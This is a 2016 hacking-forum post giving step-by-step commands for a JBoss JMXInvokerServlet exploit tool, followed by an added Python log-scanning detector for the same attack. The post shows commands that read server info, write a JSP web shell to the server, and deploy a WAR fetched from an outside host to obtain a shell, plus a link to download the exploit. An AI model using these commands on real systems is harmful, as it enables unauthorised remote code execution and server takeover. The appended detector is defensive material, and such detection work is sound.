HackerTop - View topic - jboss exploit
 jboss exploit 
Site Admin
1. View system name
Code:
java -jar jboss_exploit_fat.jar -i http://127.0.0.1:8080/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName

2. View system version
Code:
java -jar jboss_exploit_fat.jar -i http://127.0.0.1:8080/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion

3. Remote create file
Code:
java -jar jboss_exploit_fat.jar -i http://127.0.0.1:8080/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository store myname.war index .jsp $content$ true -s java.lang.String;java.lang.String;java.lang.String;java.lang.String;java.lang.Boolean


$content$ is the contents of the shell.jsp file

Upload the shell.jsp file to the server and deploy the war; after success, visit:
Code:
http://127.0.0.1:8080/myname/index.jsp


If myname shows OK, it is deployed successfully

4. Remote deployment war
Code:
java -jar jboss_exploit_fat.jar -i http://127.0.0.1:8080/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://scriptsgenie.com/demo/test.war

Get shell:
Code:
http://127.0.0.1:8080/test/shell.jsp


exploit download:

Attachment:
jboos_exp.zip [4.36 MiB]
Downloaded 92 times


Fri Aug 05, 2016 3:49 pm
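
Added example (not part of the original post or of the tool it describes): a defender-side check that scans HTTP access logs for requests to the /invoker/JMXInvokerServlet path used in the steps above, and for a first-seen web context serving a .jsp shortly afterwards. The common log format, the 10-minute correlation window, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed sample lines in common log format (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [05/Aug/2016:15:40:01 +0000] "GET /app/home.jsp HTTP/1.1" 200 5120
198.51.100.7 - - [05/Aug/2016:15:41:12 +0000] "POST /invoker/JMXInvokerServlet HTTP/1.1" 200 412
198.51.100.7 - - [05/Aug/2016:15:41:30 +0000] "GET /myname/index.jsp HTTP/1.1" 200 2
192.0.2.10 - - [05/Aug/2016:15:42:00 +0000] "GET /app/home.jsp HTTP/1.1" 200 5120
203.0.113.5 - - [05/Aug/2016:16:30:00 +0000] "GET /reports/view.jsp HTTP/1.1" 200 900
"""

# Captures: client, timestamp, method, path, status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
INVOKER_PATH = "/invoker/JMXInvokerServlet"  # path taken from the post above
WINDOW = timedelta(minutes=10)               # assumed correlation window


def parse(line):
    """Return (ip, time, method, path, status) or None for unparsable lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    return ip, when, method, path.split("?", 1)[0], int(status)


def detect(log_text, window=WINDOW):
    """Flag invoker requests and JSPs served from contexts first seen soon after."""
    alerts, seen_contexts, last_invoker = [], set(), None
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        ip, when, method, path, status = rec
        if path.startswith(INVOKER_PATH):
            last_invoker = when
            alerts.append(("invoker_access", ip, path))
            continue
        # First path segment is the web context ("" for the root context).
        context = path.split("/")[1] if path.count("/") >= 2 else ""
        first_seen = context not in seen_contexts
        seen_contexts.add(context)
        if (last_invoker and first_seen and path.endswith(".jsp")
                and status == 200 and when - last_invoker <= window):
            alerts.append(("new_context_after_invoker", ip, path))
    return alerts
```

The log must be in chronological order; a context that first appears outside the window, such as /reports in the sample, is not flagged.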